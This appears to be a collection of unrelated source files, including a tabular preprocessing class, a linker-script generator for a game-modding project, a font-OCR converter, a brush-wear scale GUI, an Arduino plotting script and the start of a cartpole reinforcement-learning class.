        dimensions are the same for all columns and this attribute is not
generated during the ``fit`` process
label_encoder: LabelEncoder
        see :class:`pytorch_widedeep.utils.deeptabular_utils.LabelEncoder`
embeddings_input: List
List of Tuples with the column name, number of individual values for
that column and the corresponding embeddings dim, e.g. [
('education', 16, 10), ('relationship', 6, 8), ...]
standardize_cols: List
        List of the columns that will be standardized
scaler: StandardScaler
an instance of :class:`sklearn.preprocessing.StandardScaler`
column_idx: Dict
Dictionary where keys are column names and values are column indexes.
        This is necessary to slice tensors
Examples
--------
>>> import pandas as pd
>>> from pytorch_widedeep.preprocessing import TabPreprocessor
>>> df = pd.DataFrame({'color': ['r', 'b', 'g'], 'size': ['s', 'n', 'l'], 'age': [25, 40, 55]})
>>> embed_cols = [('color',5), ('size',5)]
>>> cont_cols = ['age']
>>> deep_preprocessor = TabPreprocessor(embed_cols=embed_cols, continuous_cols=cont_cols)
>>> deep_preprocessor.fit_transform(df)
array([[ 1. , 1. , -1.22474487],
[ 2. , 2. , 0. ],
[ 3. , 3. , 1.22474487]])
>>> deep_preprocessor.embed_dim
{'color': 5, 'size': 5}
>>> deep_preprocessor.column_idx
{'color': 0, 'size': 1, 'age': 2}
"""
def __init__(
self,
embed_cols: Union[List[str], List[Tuple[str, int]]] = None,
continuous_cols: List[str] = None,
scale: bool = True,
auto_embed_dim: bool = True,
default_embed_dim: int = 16,
already_standard: List[str] = None,
for_tabtransformer: bool = False,
verbose: int = 1,
):
super(TabPreprocessor, self).__init__()
self.embed_cols = embed_cols
self.continuous_cols = continuous_cols
self.scale = scale
self.auto_embed_dim = auto_embed_dim
self.default_embed_dim = default_embed_dim
self.already_standard = already_standard
self.for_tabtransformer = for_tabtransformer
self.verbose = verbose
self.is_fitted = False
if (self.embed_cols is None) and (self.continuous_cols is None):
raise ValueError(
"'embed_cols' and 'continuous_cols' are 'None'. Please, define at least one of the two."
)
tabtransformer_error_message = (
"If for_tabtransformer is 'True' embed_cols must be a list "
" of strings with the columns to be encoded as embeddings."
)
if self.for_tabtransformer and self.embed_cols is None:
raise ValueError(tabtransformer_error_message)
if self.for_tabtransformer and isinstance(self.embed_cols[0], tuple): # type: ignore[index]
raise ValueError(tabtransformer_error_message)
if self.for_tabtransformer and self.scale:
warnings.warn(
"Both 'for_tabtransformer' and 'scale' are set to True. "
"This implies that the continuous columns will be "
"standarized and then passed through a LayerNorm layer",
UserWarning,
)
def fit(self, df: pd.DataFrame) -> BasePreprocessor:
"""Fits the Preprocessor and creates required attributes"""
if self.embed_cols is not None:
df_emb = self._prepare_embed(df)
self.label_encoder = LabelEncoder(df_emb.columns.tolist()).fit(df_emb)
self.embeddings_input: List = []
for k, v in self.label_encoder.encoding_dict.items():
if self.for_tabtransformer:
self.embeddings_input.append((k, len(v)))
else:
self.embeddings_input.append((k, len(v), self.embed_dim[k]))
if self.continuous_cols is not None:
df_cont = self._prepare_continuous(df)
if self.scale:
df_std = df_cont[self.standardize_cols]
self.scaler = StandardScaler().fit(df_std.values)
elif self.verbose:
warnings.warn("Continuous columns will not be normalised")
self.is_fitted = True
return self
def transform(self, df: pd.DataFrame) -> np.ndarray:
"""Returns the processed ``dataframe`` as a np.ndarray"""
check_is_fitted(self, condition=self.is_fitted)
if self.embed_cols is not None:
df_emb = self._prepare_embed(df)
df_emb = self.label_encoder.transform(df_emb)
if self.continuous_cols is not None:
df_cont = self._prepare_continuous(df)
if self.scale:
df_std = df_cont[self.standardize_cols]
df_cont[self.standardize_cols] = self.scaler.transform(df_std.values)
try:
df_deep = pd.concat([df_emb, df_cont], axis=1)
except NameError:
try:
df_deep = df_emb.copy()
except NameError:
df_deep = df_cont.copy()
self.column_idx = {k: v for v, k in enumerate(df_deep.columns)}
return df_deep.values
def inverse_transform(self, encoded: np.ndarray) -> pd.DataFrame:
r"""Takes as input the output from the ``transform`` method and it will
return the original values.
Parameters
----------
encoded: np.ndarray
array with the output of the ``transform`` method
"""
decoded = pd.DataFrame(encoded, columns=self.column_idx.keys())
# embeddings back to original category
if self.embed_cols is not None:
if isinstance(self.embed_cols[0], tuple):
emb_c: List = [c[0] for c in self.embed_cols]
else:
emb_c = self.embed_cols.copy()
for c in emb_c:
decoded[c] = decoded[c].map(self.label_encoder.inverse_encoding_dict[c])
        # continuous_cols back to non-standardised
try:
decoded[self.continuous_cols] = self.scaler.inverse_transform(
decoded[self.continuous_cols]
)
except AttributeError:
pass
return decoded
def fit_transform(self, df: pd.DataFrame) -> np.ndarray:
"""Combines ``fit`` and ``transform``"""
return self.fit(df).transform(df)
def _prepare_embed(self, df: pd.DataFrame) -> pd.DataFrame:
if self.for_tabtransformer:
return df.copy()[self.embed_cols]
else:
if isinstance(self.embed_cols[0], tuple):
self.embed_dim = dict(self.embed_cols) # type: ignore
embed_colname = [emb[0] for emb in self.embed_cols]
elif self.auto_embed_dim:
n_cats = {col: df[col].nunique() for col in self.embed_cols}
self.embed_dim = {col: embed_sz_rule(n_cat) for col, n_cat in n_cats.items()} # type: ignore[misc]
embed_colname = self.embed_cols # type: ignore
else:
self.embed_dim = {e: self.default_embed_dim for e in self.embed_cols} # type: ignore
embed_colname = self.embed_cols # type: ignore
return df.copy()[embed_colname]
def _prepare_continuous(self, df: pd.DataFrame) -> pd.DataFrame:
if self.scale:
if self.already_standard is not None:
self.standardize_cols = [
c for c in self.continuous_cols if c not in self.already_standard
]
else:
self.standardize_cols = self.continuous_cols
return df.copy()[self.continuous_cols]
``` |
{
"source": "5uso/skyline",
"score": 2
} |
#### File: skyline/scripts/common.py
```python
HPP_NAMESPACE = "KingSymbols150"
# Mangle for extern void cleanName()
def mangleFunctionName(cleanName):
return "_ZN" + str(len(HPP_NAMESPACE)) + HPP_NAMESPACE + str(len(cleanName)) + cleanName + "Ev"
# Mangle for extern void* cleanName;
def mangleDataName(cleanName):
return "_ZN" + str(len(HPP_NAMESPACE)) + HPP_NAMESPACE + str(len(cleanName)) + cleanName + "E"
```
#### File: skyline/scripts/genLinkerScript.py
```python
import os, csv, sys
from common import mangleDataName, mangleFunctionName
# consts
CUSTOM_HEADER = """
/*
* This is a generated file
* DO NOT EDIT THIS FILE DIRECTLY
* Generate with genLinkerScript.py instead
*/
"""
# The paths to search for LinkerHints
INCLUDE = ["include", "linkerscripts"]
# The extensions of files
EXTENSIONS = [".h", ".hpp", ".links"]
# Search strings
DISABLED = "Disabled"
LINKER_HINTS = "Links"
# Offset for symbols in main (beginning of skyline - beginning of main)
MAIN_OFFSET = "0x2d91000"
# Namespace for the generated header
HPP_NAMESPACE = "KingSymbols150"
# Prefix function name
FUNC_PREFIX = "f_"
# Prefix Data symbols
DATA_PREFIX = "d_"
FUNC_ALIAS = f"{HPP_NAMESPACE}::{FUNC_PREFIX}"
DATA_ALIAS = f"{HPP_NAMESPACE}::{DATA_PREFIX}"
LD_OUTPUT = "linkerscripts/syms150.ld"
def createLinkerScriptLine(addrStr, mangledName, comment):
commentStr = ""
if comment != None:
commentStr = f"/* {comment} */"
return f"{mangledName} = {addrStr} - {MAIN_OFFSET}; {commentStr}\n"
# If line is just comment, return comment, otherwise return None
def parseLine(rawLine):
if rawLine.startswith("//"):
return rawLine[2:].strip()
elif rawLine.startswith("/*") and rawLine.endswith("*/"):
return rawLine[2:len(rawLine)-2].strip()
else:
return None
def extractComments(line):
parenStart = line.find("(")
parenEnd = line.find(")")
comment = None
if parenEnd > parenStart and parenEnd != -1:
comment = line[parenStart+1:parenEnd]
line = line[:parenStart]
return line, comment
def scanFileForLinkerHints(ldAddrData, ldSymbData, pathStr, headerFile):
headerLines = headerFile.readlines()
savedLines = ""
for line in headerLines:
lineStripped = line.strip()
# Process multi line
if lineStripped.endswith("\\"):
savedLines += lineStripped[:-1]
continue
lineStripped = savedLines + lineStripped
savedLines = ""
lineContent = parseLine(lineStripped) # Part of the line without comment symbols
if lineContent == None:
continue
lineContent, comment = extractComments(lineContent)
parts = lineContent.split()
if len(parts) >= 3 and parts[0] == LINKER_HINTS:
addrStr = parts[1]
mangledName = parts[2]
# addrStr can be another symbol
if not addrStr.startswith("0x"):
# Add to symbdata to resolve later
ldSymbData.append((addrStr, mangledName, comment, pathStr))
else:
ldAddrData[addrStr] = (mangledName, comment)
def scanPathForLinkerHints(ldAddrData, ldSymbData, pathStr):
if os.path.isfile(pathStr):
if os.path.splitext(pathStr)[1] in EXTENSIONS:
with open(pathStr) as headerFile:
scanFileForLinkerHints(ldAddrData, ldSymbData, pathStr, headerFile)
elif os.path.isdir(pathStr):
print("Scanning", pathStr)
dirContent = os.listdir(pathStr)
for subPathName in dirContent:
scanPathForLinkerHints(ldAddrData, ldSymbData, os.path.join(pathStr, subPathName))
ldLines = []
ldAddrData = {}
ldSymbData = []
for pathStr in INCLUDE:
scanPathForLinkerHints(ldAddrData, ldSymbData, pathStr)
print("Resolving...")
ldSymbolToAddress = {}
addrCount = 0
for addrStr in ldAddrData:
mangledName, comment = ldAddrData[addrStr]
line = createLinkerScriptLine(addrStr, mangledName, comment)
ldSymbolToAddress[mangledName] = addrStr
ldLines.append(line)
addrCount+=1
print("Resolved", addrCount, "links to address")
symbCount = 0
funcCount = 0
dataCount = 0
for symbStr, mangledName, comment, pathStr in ldSymbData:
mangledSymbol = ""
if symbStr.startswith(FUNC_ALIAS):
funcName = symbStr[len(FUNC_ALIAS)-len(FUNC_PREFIX):]
mangledSymbol = mangleFunctionName(funcName)
funcCount+=1
elif symbStr.startswith(DATA_ALIAS):
dataName = symbStr[len(DATA_ALIAS)-len(DATA_PREFIX):]
mangledSymbol = mangleDataName(dataName)
dataCount+=1
else:
mangledSymbol = symbStr
symbCount+=1
if mangledSymbol not in ldSymbolToAddress:
print("Error: Fail to resolve", symbStr, "from", pathStr)
sys.exit(-1)
resolvedAddrStr = ldSymbolToAddress[mangledSymbol]
line = createLinkerScriptLine(resolvedAddrStr, mangledName, comment)
ldLines.append(line)
print("Resolved", symbCount, "links to symbols")
print("Resolved", funcCount, "links to uking functions")
print("Resolved", dataCount, "links to uking data")
# Write ld
print("Writing", LD_OUTPUT)
with open(LD_OUTPUT, "w+") as ldFile:
ldFile.write(f"/* {LD_OUTPUT} */\n")
ldFile.write(CUSTOM_HEADER)
ldFile.write(f"blank = 0;\n")
ldFile.writelines(ldLines)
print("Written",len(ldLines),"symbol mapping")
``` |
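The script above scans the include/linkerscripts paths for comment lines of the form `// Links <address-or-symbol> <mangledName> (optional comment)` and rewrites each into an ld assignment relative to `MAIN_OFFSET`. A minimal sketch of that transformation (the address, symbol and comment are made up):

```python
# Mirrors createLinkerScriptLine() above; everything below is hypothetical.
MAIN_OFFSET = "0x2d91000"

def linker_line(addr, name, comment):
    return f"{name} = {addr} - {MAIN_OFFSET}; /* {comment} */"

# A header hint such as:
#   // Links 0x0000007102a4c88 _ZN14KingSymbols1508doSelectEv (example hint)
# ends up in linkerscripts/syms150.ld as:
print(linker_line("0x0000007102a4c88", "_ZN14KingSymbols1508doSelectEv", "example hint"))
# _ZN14KingSymbols1508doSelectEv = 0x0000007102a4c88 - 0x2d91000; /* example hint */
```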
{
"source": "5uw1st/font-converter",
"score": 2
} |
#### File: font-converter/font_converter/converter.py
```python
import logging
import re
from base64 import b64decode, b64encode
from io import BytesIO
import pytesseract
import requests
from PIL import Image, ImageFont, ImageDraw, ImageColor
from .helper import RedisClient, HEADERS
class FontConverter(object):
"""
Font converter
"""
def __init__(self, font_url, logger=None, redis_client=None, debug=False, lang="chi_sim", pool_size=5, **kwargs):
self._font_url = font_url
self._debug = debug
self._lang = lang
self._pool_size = pool_size
self.logger = logger or logging.getLogger()
self._reg_font_sign = re.compile(r'fonts-styles/fonts/\w+/(\w+?)/tyc-num')
self._expire_time = kwargs.get("expire_time") or 30 * 24 * 3600
self._redis_client = redis_client or RedisClient(**kwargs)
self._font_content = None
self._font_key = ""
self._word_key = ""
self._words_dict = {}
self._init_data()
def _init_data(self):
sign = self._get_font_sign(font_url=self._font_url)
self._font_key = self._get_redis_key(sign=sign, key_type="CONTENT") # init key
self._word_key = self._get_redis_key(sign=sign, key_type="WORD")
self._font_content = self._get_font_content()
self.logger.debug("===>Init data, sign:{1}, font_url:{0}".format(self._font_url, sign))
def _get_redis_key(self, sign, key_type="CONTENT"):
"""
        Build the redis key, e.g. FontConverter:CONTENT:5534d7da
        :param sign: str font sign
        :param key_type: str CONTENT/WORD
:return: str
"""
return ":".join([self.__class__.__name__, key_type, sign])
def _download_font(self, font_url):
"""
        Download the font content
:param font_url: str
:return: font_bytes
"""
return requests.get(font_url, headers=HEADERS, timeout=10).content
def _get_font_sign(self, font_url):
"""
        Get the font signature (used to decide whether the font has changed)
:param font_url: str
:return: str
"""
_ret = self._reg_font_sign.search(font_url)
if not _ret:
raise RuntimeError("font url validate:{0}".format(font_url))
return _ret.group(1)
def _get_font_content(self):
"""
        Get the font file content (from the redis cache, or download it)
:return: bytes
"""
b64_value = self._redis_client.get(self._font_key)
if b64_value:
content = b64decode(b64_value.decode())
else:
content = self._download_font(font_url=self._font_url)
self._save_font_to_redis(key=self._font_key, font_bytes=content)
return content
def _save_font_to_redis(self, key, font_bytes):
"""
        Save the font content to redis
:param key: str
:param font_bytes: bytes
:return: bool
"""
b64 = b64encode(font_bytes)
return self._redis_client.setex(key, self._expire_time, b64)
def _parse_word_from_font(self, word):
img = Image.new("RGB", (300, 300), (255, 255, 255))
draw = ImageDraw.Draw(img)
font = ImageFont.truetype(BytesIO(self._font_content), 200)
draw.text((10, 10), text=word, font=font, fill=ImageColor.getcolor('black', 'RGB'))
if self._debug:
img.show()
if word.isdigit():
ps = "--psm 6 digits"
else:
ps = "--psm 8 -l {0}".format(self._lang)
result = pytesseract.image_to_string(img, config=ps)
if result == "":
return word
else:
return result[0]
def _get_origin_word(self, now_word):
"""
        Get the original character for the given obfuscated character
        :param now_word: str
        :return: str
"""
origin = self._redis_client.hget(self._word_key, now_word)
if origin is not None:
return origin.decode()
        # not cached yet, parse it from the font
origin_word = self._parse_word_from_font(word=str(now_word))
self._save_word_to_redis(now_word=now_word, origin_word=origin_word)
self.logger.info("===>New word, [{0}]==>[{1}]".format(now_word, origin_word))
return origin_word
def _save_word_to_redis(self, now_word, origin_word):
"""
        Save the character mapping to redis
:param now_word: str
:param origin_word: str
:return: bool
"""
self._redis_client.hsetnx(self._word_key, now_word, origin_word)
if self._redis_client.ttl(self._word_key) < 0:
self._redis_client.expire(self._word_key, self._expire_time)
def _do_convert(self, word):
"""
        Convert a single character (using the in-memory cache, redis, or OCR)
        :param word: str
        :return: str
"""
if word in self._words_dict.keys():
return self._words_dict[word]
origin = self._get_origin_word(now_word=word)
self._words_dict[word] = origin
return origin
def get_dict(self):
return self._words_dict
def clear(self):
self._redis_client.delete(self._word_key)
        self._redis_client.delete(self._font_key)
del self._words_dict
def convert(self, words):
"""
        Convert an obfuscated string, character by character
        :param words: str
        :return: str
"""
result = []
for word in words:
# TODO use process pool
result.append(self._do_convert(word=word))
return "".join(result)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
pass
def __str__(self):
return "<{0}|{1}>".format(self.__class__.__name__, self._font_url)
```
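A minimal usage sketch for the class above. The font URL and redis URI are placeholders; the URL only has to match the `fonts-styles/fonts/.../tyc-num` pattern that `_get_font_sign` expects:

```python
# Illustrative sketch only -- the URLs below are placeholders.
from font_converter.converter import FontConverter

font_url = "https://static.example.com/fonts-styles/fonts/abc/5534d7da/tyc-num.woff"
with FontConverter(font_url=font_url, redis_uri="redis://127.0.0.1:6379/0") as fc:
    plain = fc.convert("0123456789")  # OCR each obfuscated glyph, caching the mapping
    print(plain, fc.get_dict())
```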
#### File: font-converter/font_converter/helper.py
```python
import os
import redis
HEADERS = {
"Sec-Fetch-Mode": "cors",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
"(KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36",
}
class RedisClient(object):
"""
Redis connect client
"""
def __init__(self, redis_uri=None, **kwargs):
self.__conn = None
self.redis_uri = redis_uri or kwargs.get("redis_uri")
if not self.redis_uri:
raise RuntimeError("Must set redis_uri")
def _get_conn(self):
if not self.__conn:
self.__conn = redis.from_url(url=self.redis_uri)
return self.__conn
@property
def conn(self):
return self._get_conn()
def __getattr__(self, item):
return getattr(self.conn, item)
def test(self):
return self.ping()
def get_env(key, default=None):
return os.environ.get(key, default=default)
``` |
{
"source": "5voltsgc/brush_wear",
"score": 3
} |
#### File: 5voltsgc/brush_wear/brush_wear_gui.py
```python
import tkinter as tk
from tkinter import ttk
import serial
# Global Variables
Number_samples = 3
red_first_time = True
blue_first_time = True
green_first_time = True
green_brush = ['[0] item Number',
'[1] Fiber Count',
'[2] Fiber Radius',
'[3] Start Length',
'[4] Start weight',
'[5] Current weight',
'[6] Diff from Previous weight',
'[7] Current Length'
]
red_brush = ['[0] item Number',
'[1] Fiber Count',
'[2] Fiber Radius',
'[3] Start Length',
'[4] Start weight',
'[5] Current weight',
'[6] Diff from Previous weight',
'[7] Current Length'
]
blue_brush = ['[0] item Number',
'[1] Fiber Count',
'[2] Fiber Radius',
'[3] Start Length',
'[4] Start weight',
'[5] Current weight',
'[6] Diff from Previous weight',
'[7] Current Length'
]
comm_port = "COM29" # this is the comm port the scale is connected to
# Serial Port - Change port to match serial port on computer device manager
# serialPort = serial.Serial(port=comm_port, baudrate=9600,
# bytesize=8, timeout=2, stopbits=serial.STOPBITS_ONE)
# Main Window
window = tk.Tk()
window.resizable(width=False, height=False)
window.title("Bursh Wear Testing - Lathe")
window.geometry('1100x300')
# Separator objects
separator1 = ttk.Separator(window, orient='vertical')
separator1.place(relx=0.33, rely=0, relwidth=0.2, relheight=1)
separator2 = ttk.Separator(window, orient='vertical')
separator2.place(relx=0.66, rely=0, relwidth=0.2, relheight=1)
def Weight_read():
serialString = "" # Used to hold data coming over UART
try:
serialString = serialPort.readline()
serialString = serialString.decode('Ascii').strip('+').strip()
serialString = serialString[:-1]
return(float(serialString))
except ValueError:
# just return 0 Zero if cant be converted to float, and try again
return(0)
def sample_weight():
average_weight = []
for x in range(Number_samples):
read = Weight_read()
average_weight.append(read)
current_weight = Weight_read()
max_weight = max(average_weight)
min_weight = min(average_weight)
loop_count = 0
while max_weight != min_weight:
average_weight.pop(0)
current_weight = Weight_read()
average_weight.append(current_weight)
max_weight = max(average_weight)
min_weight = min(average_weight)
loop_count += 1
if loop_count > 25:
print("check scale! can't get a stable reading")
return(current_weight)
def find_num_fibers(fiber_diameter):
# TODO
num_fibers = fiber_diameter * 500
return(num_fibers)
# Label objects
Blue_lbl = ttk.Label(window, text="Blue Brushes",
background="blue", font=("Helvetica", 16), width=30)
Blue_lbl.grid(column=0, row=4, rowspan=2, columnspan=5)
Red_lbl = ttk.Label(window, text="Red Brushes",
background="red", font=("Helvetica", 16), width=30)
Red_lbl.grid(column=6, row=4, rowspan=2, columnspan=5)
Green_lbl = ttk.Label(window, text="Green Brushes",
background="green", font=("Helvetica", 16), width=30)
Green_lbl.grid(column=12, row=4, rowspan=2, columnspan=5)
# Brush tuple: Column 0=Item#, 1=Length, 2=Fiber Diameter
Brushes = (
['Not Measured', 0, 0],
['110733-01', 3.00, .010],
['110733-02', 3.00, .012],
['110733-03', 3.00, .015],
['110733-04', 3.19, .010],
['110733-05', 3.19, .012],
['110733-06', 3.19, .015],
['110733-07', 3.25, .010],
['110733-08', 3.25, .012],
['110733-09', 3.25, .015],
['110733-10', 3.34, .010],
['110733-11', 3.34, .012],
['110733-12', 3.34, .015],
['110733-13', 3.47, .010],
['110733-14', 3.47, .012],
['110733-15', 3.47, .015],
['110733-16', 3.53, .012],
['110733-17', 3.28, .012],
['110733-18', 3.65, .015],
['110733-19', 2.32, .008],
['110733-20', 2.32, .010],
['110733-21', 2.32, .012],
['110733-22', 2.50, .010],
['110733-23', 2.50, .012],
['110733-24', 2.50, .015],
['110733-25', 3.88, .012],
['110733-26', 3.65, .010],
['110733-27', 3.65, .012],
['110733-28', 3.65, .019],
['110733-29', 4.28, .010])
# Blue Combobox creation
Blue_combo = ttk.Combobox(window)
Blue_combo['values'] = Brushes
Blue_combo.current(1) # set the selected item
Blue_combo.grid(column=2, row=15)
# Red Combobox creation
Red_combo = ttk.Combobox(window)
Red_combo['values'] = Brushes
Red_combo.current(2) # set the selected item
Red_combo.grid(column=7, row=15)
# Green Combobox creation
Green_combo = ttk.Combobox(window)
Green_combo['values'] = Brushes
Green_combo.current(3) # set the selected item
Green_combo.grid(column=13, row=15)
# Selected Blue Brush
def Blue_clicked():
Blue_Brush = Blue_combo.get()
print(Blue_Brush)
print(Blue_start.get())
BlueButton = tk.Button(window, text='Record', command=Blue_clicked)
BlueButton.grid(column=2, row=50)
# Selected Red Brush
def Red_clicked():
Red_Brush = Red_combo.get() # sting
print(Red_Brush)
RedButton = tk.Button(window, text='Record', command=Red_clicked)
RedButton.grid(column=7, row=50)
# #############################################################################
# GREEN BUTTON
# #############################################################################
# Selected Green Brush
global green_brush
def Green_clicked():
"""
This function will be repeated for the other two buttons.
Collect information: Scale weight, Brush info, previous weight, and do the
calculations. Format this data for the tkinter GUI, and the output file
"""
global green_first_time
global green_brush
# Change button to be sunken, the command can not be run again
GreenButton.config(text='Recorded', relief='sunken', command='')
# Get the current weight from the scale
current_weight = sample_weight()
# Find out if this is the first record
if green_first_time:
green_first_time = False
# read the selected brush then make it grayed out
brush_info = Green_combo.get()
Green_combo.config(relief='sunken') # disabled=True
# TODO regex to parse the brush info into green_brush
green_brush[0] = brush_info[:8]
green_brush[2] = float(brush_info[-5:])/2
green_brush[4] = current_weight
# if green_first_time:
# green_first_time = False
# green_fiber_diamter = float(brush_info[-5:])
# find_num_fibers(green_fiber_diamter)
# G_start.set(current_weight)
# else:
# G_Current.set(G_Current.get())
# TODO add command if desired to change
# Green = sample_weight()
# G_Previous = Green
# G_Previous = find_num_fibers()
# print(G_Previous)
# print(Green)
GreenButton = tk.Button(window, text='Record', command=Green_clicked)
GreenButton.grid(column=13, row=50)
# Blue labels and Text Boxes
Blue_Start_lbl = ttk.Label(window,
text="Start Weight(g)",
font=("Helvetica", 12))
Blue_Start_lbl.grid(column=1, row=44,)
B_start = tk.StringVar()
Blue_start = ttk.Entry(window, width=15, textvariable=B_start)
Blue_start.grid(column=2, row=44)
Blue_Previous_lbl = ttk.Label(window,
text="Previous Weight(g)",
font=("Helvetica", 12))
Blue_Previous_lbl.grid(column=1, row=45,)
B_Previous = tk.StringVar()
Blue_Previous = ttk.Entry(window, width=15, textvariable=B_Previous)
Blue_Previous.grid(column=2, row=45)
Blue_Current_lbl = ttk.Label(window,
text="Current Weight(g)",
font=("Helvetica", 12))
Blue_Current_lbl.grid(column=1, row=46,)
B_Current = tk.StringVar()
Blue_Current = ttk.Entry(window, width=15, textvariable=B_Current)
Blue_Current.grid(column=2, row=46)
Blue_Diff_lbl = ttk.Label(window,
text="Difference Weight (g)",
font=("Helvetica", 12))
Blue_Diff_lbl.grid(column=1, row=47,)
B_diff = tk.StringVar()
Blue_diff = ttk.Entry(window, width=15, textvariable=B_diff)
Blue_diff.grid(column=2, row=47)
Blue_wear_lbl = ttk.Label(window,
text="Wear (mm)",
font=("Helvetica", 12))
Blue_wear_lbl.grid(column=1, row=48)
B_wear = tk.StringVar()
Blue_wear = ttk.Entry(window, width=15, textvariable=B_wear)
Blue_wear.grid(column=2, row=48)
Blue_total_wear_lbl = ttk.Label(window,
text="Total Wear (mm)",
font=("Helvetica", 12))
Blue_total_wear_lbl.grid(column=1, row=49,)
B_total_wear = tk.StringVar()
Blue_total_wear = ttk.Entry(window, width=15, textvariable=B_total_wear)
Blue_total_wear.grid(column=2, row=49)
# Red labels and Text Boxes
Red_Start_lbl = ttk.Label(window,
text="Start Weight(g)",
font=("Helvetica", 12))
Red_Start_lbl.grid(column=6, row=44,)
R_start = tk.StringVar()
Red_start = ttk.Entry(window, width=15, textvariable=R_start)
Red_start.grid(column=7, row=44)
Red_Previous_lbl = ttk.Label(window,
text="Previous Weight(g)",
font=("Helvetica", 12))
Red_Previous_lbl.grid(column=6, row=45,)
R_Previous = tk.StringVar()
Red_Previous = ttk.Entry(window, width=15, textvariable=R_Previous)
Red_Previous.grid(column=7, row=45)
Red_Current_lbl = ttk.Label(window,
text="Current Weight(g)",
font=("Helvetica", 12))
Red_Current_lbl.grid(column=6, row=46,)
R_Current = tk.StringVar()
Red_Current = ttk.Entry(window, width=15, textvariable=R_Current)
Red_Current.grid(column=7, row=46)
Red_Diff_lbl = ttk.Label(window,
text="Difference Weight (g)",
font=("Helvetica", 12))
Red_Diff_lbl.grid(column=6, row=47,)
R_diff = tk.StringVar()
Red_diff = ttk.Entry(window, width=15, textvariable=R_diff)
Red_diff.grid(column=7, row=47)
Red_wear_lbl = ttk.Label(window,
text="Wear (mm)",
font=("Helvetica", 12))
Red_wear_lbl.grid(column=6, row=48)
R_wear = tk.StringVar()
Red_wear = ttk.Entry(window, width=15, textvariable=R_wear)
Red_wear.grid(column=7, row=48)
Red_total_wear_lbl = ttk.Label(window,
text="Total Wear (mm)",
font=("Helvetica", 12))
Red_total_wear_lbl.grid(column=6, row=49,)
R_total_wear = tk.StringVar()
Red_total_wear = ttk.Entry(window, width=15, textvariable=R_total_wear)
Red_total_wear.grid(column=7, row=49)
# Green labels and Text Boxes
Green_Start_lbl = ttk.Label(window,
text="Start Weight(g)",
font=("Helvetica", 12))
Green_Start_lbl.grid(column=12, row=44,)
G_start = tk.StringVar()
Green_start = ttk.Entry(window, width=15, textvariable=G_start)
Green_start.grid(column=13, row=44)
Green_Previous_lbl = ttk.Label(window,
text="Previous Weight(g)",
font=("Helvetica", 12))
Green_Previous_lbl.grid(column=12, row=45,)
G_Previous = tk.StringVar()
Green_Previous = ttk.Entry(window, width=15, textvariable=G_Previous)
Green_Previous.grid(column=13, row=45)
Green_Current_lbl = ttk.Label(window,
text="Current Weight(g)",
font=("Helvetica", 12))
Green_Current_lbl.grid(column=12, row=46,)
G_Current = tk.StringVar()
Green_Current = ttk.Entry(window, width=15, textvariable=G_Current)
Green_Current.grid(column=13, row=46)
Green_Diff_lbl = ttk.Label(window,
text="Difference Weight (g)",
font=("Helvetica", 12))
Green_Diff_lbl.grid(column=12, row=47,)
G_diff = tk.StringVar()
Green_diff = ttk.Entry(window, width=15, textvariable=G_diff)
Green_diff.grid(column=13, row=47)
Green_wear_lbl = ttk.Label(window,
text="Wear (mm)",
font=("Helvetica", 12))
Green_wear_lbl.grid(column=12, row=48)
G_wear = tk.StringVar()
Green_wear = ttk.Entry(window, width=15, textvariable=G_wear)
Green_wear.grid(column=13, row=48)
Green_total_wear_lbl = ttk.Label(window,
text="Total Wear (mm)",
font=("Helvetica", 12))
Green_total_wear_lbl.grid(column=12, row=49,)
G_total_wear = tk.StringVar()
Green_total_wear = ttk.Entry(window, width=15, textvariable=G_total_wear)
Green_total_wear.grid(column=13, row=49)
window.mainloop()
```
#### File: 5voltsgc/brush_wear/fiber_count.py
```python
def find_fiber_count(scale, fiber_radius=0.127, fiber_height=76.2,
collar=2.213479):
""" Find Fiber Count, this function returns the estimated count of fibers.
This is calculated by following these steps:
    Step 1. Find the weight of all fibers by subtracting the collar weight
    (2.213479 grams) from the scale weight.
    Step 2. Calculate the weight of one fiber = pi() * radius^2 * height * density.
    Step 3. Divide the fibers weight from step 1 by the weight of one fiber from step 2.
    Step 4. Return the value from step 3 as an integer, rounded to the nearest fiber.
    The density of AISI C1018 & C1065 is 0.00787 g/mm³.
    The collar is precalculated to be 2.213479 grams.
"""
# Step 1 - Find weight of all fibers
fibers_weight = scale - collar
# Step 2 - weight of one fiber
fiber_weight = 3.141592 * fiber_radius**2 * fiber_height * 0.00787
# Step 3 - Divide weight of all fibers by weight of one fiber to find count
count = int(round(fibers_weight / fiber_weight, 0))
return(count)
weight_from_scale = 31.785
rad = 0.127
lenth = 76.2
print(find_fiber_count(weight_from_scale, rad, lenth))
``` |
{
"source": "5voltsgc/EOLT_R6",
"score": 3
} |
#### File: 5voltsgc/EOLT_R6/realTimePlotting.py
```python
import sys
import time
import serial
import matplotlib.pyplot as plt
def getdata():
arduino.write(str.encode("getdata?\n"))
resposta=arduino.readline()
decoded_bytes = str(resposta[0:len(resposta)-2].decode("utf-8"))
resposta=decoded_bytes
#print (resposta)
return resposta
plt.ion()
plt.xlabel('Time (sec)')
plt.ylabel('Temperature (deg C)')
arduino = serial.Serial('/dev/ttyUSB0',9600,timeout=2)
tempo_total=100
intervalo_tempo=3
relogio_start = time.time()
relogio_final = relogio_start + tempo_total
now=time.time()
i=0
while (now < relogio_final):
if (now > relogio_start+(intervalo_tempo*i)):
data_collected=getdata()
tempo_now = (time.time()-relogio_start)
data_to_save=str(tempo_now) + "," + data_collected
#print (data_to_save)
data=data_to_save.split(',')
plt.plot(float(data[0]),float(data[1]), 'og')
        plt.show()
plt.pause(0.0001)
i = i + 1
now=time.time()
``` |
{
"source": "5Volts/Reinforcement-Learning-For-Cartpole",
"score": 4
} |
#### File: 5Volts/Reinforcement-Learning-For-Cartpole/RL_for_cartpole.py
```python
import argparse
import random
import gym
import tensorflow as tf
import numpy as np
class RL:
def __init__(self,observation_size=4,action_size=2):
'''
Initializing Variables for this class
:param observation_size: The size of the observation space
Default : 4 (for cartpole)
[Ex: 6]
:param action_size: The size of the action space
Default : 2 (for cartpole)
[Ex: 3]
'''
self.action_size= action_size
self.observation = tf.placeholder(tf.float32,[None,observation_size])
self.labeled_moves = tf.placeholder(tf.float32,[None,action_size])
def network(self,hidden_size=100):
'''
        The deep neural network model that we will be using.
:param hidden_size: Number of nodes in the hidden layers.
Default : 100
[Ex: 64]
:return:Tensor Output of the network
'''
